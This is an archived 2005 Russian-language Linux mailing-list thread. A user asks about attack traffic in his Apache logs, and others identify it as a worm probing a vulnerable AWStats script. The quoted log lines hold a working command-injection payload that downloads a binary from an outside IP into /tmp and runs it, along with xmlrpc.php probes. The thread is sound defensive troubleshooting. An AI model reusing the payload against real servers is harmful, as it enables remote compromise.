* [Comm] Чего от меня хотят?
@ 2005-11-11 15:05 Oleg Dolgov
2005-11-11 15:21 ` [Comm] юЕЗП ПФ НЕОС ИПФСФ? Sergey Viuchny
2005-11-11 15:55 ` [Comm] Чего от меня хотят? Алексей Данилович
0 siblings, 2 replies; 4+ messages in thread
From: Oleg Dolgov @ 2005-11-11 15:05 UTC (permalink / raw)
To: community
Здравствуйте.
Запустил у себя апач в базовой конфигурации, никаких дополнений и т.п.
Скажем так, на попробовать. Т.к. открылся
наружу 80-й порт, периодически получаю порции трафика :-\
В access_log следующее:
61.19.194.4 - - [11/Nov/2005:16:50:29 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
61.19.194.4 - - [11/Nov/2005:16:50:31 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
61.19.194.4 - - [11/Nov/2005:16:50:33 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
61.19.194.4 - - [11/Nov/2005:16:50:35 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294
61.19.194.4 - - [11/Nov/2005:16:50:37 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
61.19.194.4 - - [11/Nov/2005:16:50:38 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
61.19.194.4 - - [11/Nov/2005:16:50:40 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
61.19.194.4 - - [11/Nov/2005:16:50:42 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
61.19.194.4 - - [11/Nov/2005:16:50:46 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294
61.19.194.4 - - [11/Nov/2005:16:50:51 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
61.19.194.4 - - [11/Nov/2005:16:50:52 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
Если не сложно, в двух словах для чайника: чего этим добиваются и чем мне это грозит.
Заранее благодарен.
PS. В message при этом iptables (вернее kernel) отчитывается, что ABORTED от этого хоста.
kernel: ABORTED IN=eth0 OUT= MAC=00:0e:2e:37:43:61:00:02:44:51:1e:0c:08:00
SRC=61.19.194.4 DST='мой_ip' LEN=40 TOS=0x00 PREC=0x00 TTL=37 ID=0 DF
PROTO=TCP SPT=59285 DPT=80 SEQ=3005977375 ACK=0 WINDOW=0 RES=0x00 RST URGP=0
iptables устанавливал при помощи guarddog.
--
С наилучшими,
Олег Долгов
<dolgov AT mail DOT zp DOT ua>
Registered Linux user #315454
^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: [Comm] юЕЗП ПФ НЕОС ИПФСФ?
2005-11-11 15:05 [Comm] Чего от меня хотят? Oleg Dolgov
@ 2005-11-11 15:21 ` Sergey Viuchny
2005-11-11 15:36 ` [Comm] " Oleg Dolgov
2005-11-11 15:55 ` [Comm] Чего от меня хотят? Алексей Данилович
1 sibling, 1 reply; 4+ messages in thread
From: Sergey Viuchny @ 2005-11-11 15:21 UTC (permalink / raw)
To: ALT Linux Community
наверное это ?
http://www.securitylab.ru/virus/241858.php
Oleg Dolgov wrote:
>Здравствуйте.
>
>Запустил у себя апач в базовой конфигурации, никаких дополнений и т.п.
>Скажем так, на попробовать. Т.к. открылся
>наружу 80-й порт, периодически получаю порции трафика :-\
>
>В access_log следующее:
>
>61.19.194.4 - - [11/Nov/2005:16:50:29 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
>61.19.194.4 - - [11/Nov/2005:16:50:31 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
>61.19.194.4 - - [11/Nov/2005:16:50:33 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
>61.19.194.4 - - [11/Nov/2005:16:50:35 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294
>61.19.194.4 - - [11/Nov/2005:16:50:37 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
>61.19.194.4 - - [11/Nov/2005:16:50:38 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
>61.19.194.4 - - [11/Nov/2005:16:50:40 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
>61.19.194.4 - - [11/Nov/2005:16:50:42 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
>61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
>61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
>61.19.194.4 - - [11/Nov/2005:16:50:46 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294
>61.19.194.4 - - [11/Nov/2005:16:50:51 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
>61.19.194.4 - - [11/Nov/2005:16:50:52 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
>
>Если не сложно, в двух словах для чайника: чего этим добиваются и чем мне это грозит.
>
>Заранее благодарен.
>
>PS. В message при этом iptables (вернее kernel) отчитывается, что ABORTED от этого хоста.
>
>kernel: ABORTED IN=eth0 OUT= MAC=00:0e:2e:37:43:61:00:02:44:51:1e:0c:08:00
>SRC=61.19.194.4 DST='мой_ip' LEN=40 TOS=0x00 PREC=0x00 TTL=37 ID=0 DF
>PROTO=TCP SPT=59285 DPT=80 SEQ=3005977375 ACK=0 WINDOW=0 RES=0x00 RST URGP=0
>
>iptables устанавливал при помощи guarddog.
>
>
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Community mailing list
>Community@lists.altlinux.org
>https://lists.altlinux.org/mailman/listinfo/community
>
^ permalink raw reply [flat|nested] 4+ messages in thread
* [Comm] Re: юЕЗП ПФ НЕОС ИПФСФ?
2005-11-11 15:21 ` [Comm] юЕЗП ПФ НЕОС ИПФСФ? Sergey Viuchny
@ 2005-11-11 15:36 ` Oleg Dolgov
0 siblings, 0 replies; 4+ messages in thread
From: Oleg Dolgov @ 2005-11-11 15:36 UTC (permalink / raw)
To: community
В письме Fri, 11 Nov 2005 18:21:55 +0300, Sergey Viuchny
написал:
> наверное это ?
> http://www.securitylab.ru/virus/241858.php
Ну и слава богу :-)
У меня никаких cgi-bin нет.
--
С наилучшими,
Олег Долгов
<dolgov AT mail DOT zp DOT ua>
Registered Linux user #315454
^ permalink raw reply [flat|nested] 4+ messages in thread
* Re: [Comm] Чего от меня хотят?
2005-11-11 15:05 [Comm] Чего от меня хотят? Oleg Dolgov
2005-11-11 15:21 ` [Comm] юЕЗП ПФ НЕОС ИПФСФ? Sergey Viuchny
@ 2005-11-11 15:55 ` Алексей Данилович
1 sibling, 0 replies; 4+ messages in thread
From: Алексей Данилович @ 2005-11-11 15:55 UTC (permalink / raw)
To: ALT Linux Community
наверное, не ошибусь, если скажу, что пытаются достучаться до awstats.
А он, по опыту знаю, дыряв.....
11.11.05, Oleg Dolgov<dolgov@mail.zp.ua> написал(а):
> Здравствуйте.
>
> Запустил у себя апач в базовой конфигурации, никаких дополнений и т.п.
> Скажем так, на попробовать. Т.к. открылся
> наружу 80-й порт, периодически получаю порции трафика :-\
>
> В access_log следующее:
>
> 61.19.194.4 - - [11/Nov/2005:16:50:29 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
> 61.19.194.4 - - [11/Nov/2005:16:50:31 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
> 61.19.194.4 - - [11/Nov/2005:16:50:33 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
> 61.19.194.4 - - [11/Nov/2005:16:50:35 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294
> 61.19.194.4 - - [11/Nov/2005:16:50:37 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
> 61.19.194.4 - - [11/Nov/2005:16:50:38 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
> 61.19.194.4 - - [11/Nov/2005:16:50:40 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
> 61.19.194.4 - - [11/Nov/2005:16:50:42 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
> 61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
> 61.19.194.4 - - [11/Nov/2005:16:50:45 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
> 61.19.194.4 - - [11/Nov/2005:16:50:46 +0200] "POST /xmlrpc.php HTTP/1.1" 404 294
> 61.19.194.4 - - [11/Nov/2005:16:50:51 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
> 61.19.194.4 - - [11/Nov/2005:16:50:52 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
>
> Если не сложно, в двух словах для чайника: чего этим добиваются и чем мне это грозит.
>
> Заранее благодарен.
>
> PS. В message при этом iptables (вернее kernel) отчитывается, что ABORTED от этого хоста.
>
> kernel: ABORTED IN=eth0 OUT= MAC=00:0e:2e:37:43:61:00:02:44:51:1e:0c:08:00
> SRC=61.19.194.4 DST='мой_ip' LEN=40 TOS=0x00 PREC=0x00 TTL=37 ID=0 DF
> PROTO=TCP SPT=59285 DPT=80 SEQ=3005977375 ACK=0 WINDOW=0 RES=0x00 RST URGP=0
>
> iptables устанавливал при помощи guarddog.
>
> --
> С наилучшими,
> Олег Долгов
> <dolgov AT mail DOT zp DOT ua>
> Registered Linux user #315454
>
>
>
>
> _______________________________________________
> Community mailing list
> Community@lists.altlinux.org
> https://lists.altlinux.org/mailman/listinfo/community
>
^ permalink raw reply [flat|nested] 4+ messages in thread
end of thread, other threads:[~2005-11-11 15:55 UTC | newest]
Thread overview: 4+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2005-11-11 15:05 [Comm] Чего от меня хотят? Oleg Dolgov
2005-11-11 15:21 ` [Comm] юЕЗП ПФ НЕОС ИПФСФ? Sergey Viuchny
2005-11-11 15:36 ` [Comm] " Oleg Dolgov
2005-11-11 15:55 ` [Comm] Чего от меня хотят? Алексей Данилович
ALT Linux Community general discussions
This inbox may be cloned and mirrored by anyone:
git clone --mirror http://lore.altlinux.org/community/0 community/git/0.git
# If you have public-inbox 1.1+ installed, you may
# initialize and index your mirror using the following commands:
public-inbox-init -V2 community community/ http://lore.altlinux.org/community \
mandrake-russian@linuxteam.iplabs.ru community@lists.altlinux.org community@lists.altlinux.ru community@lists.altlinux.com
public-inbox-index community
Example config snippet for mirrors.
Newsgroup available over NNTP:
nntp://lore.altlinux.org/org.altlinux.lists.community
AGPL code for this site: git clone https://public-inbox.org/public-inbox.git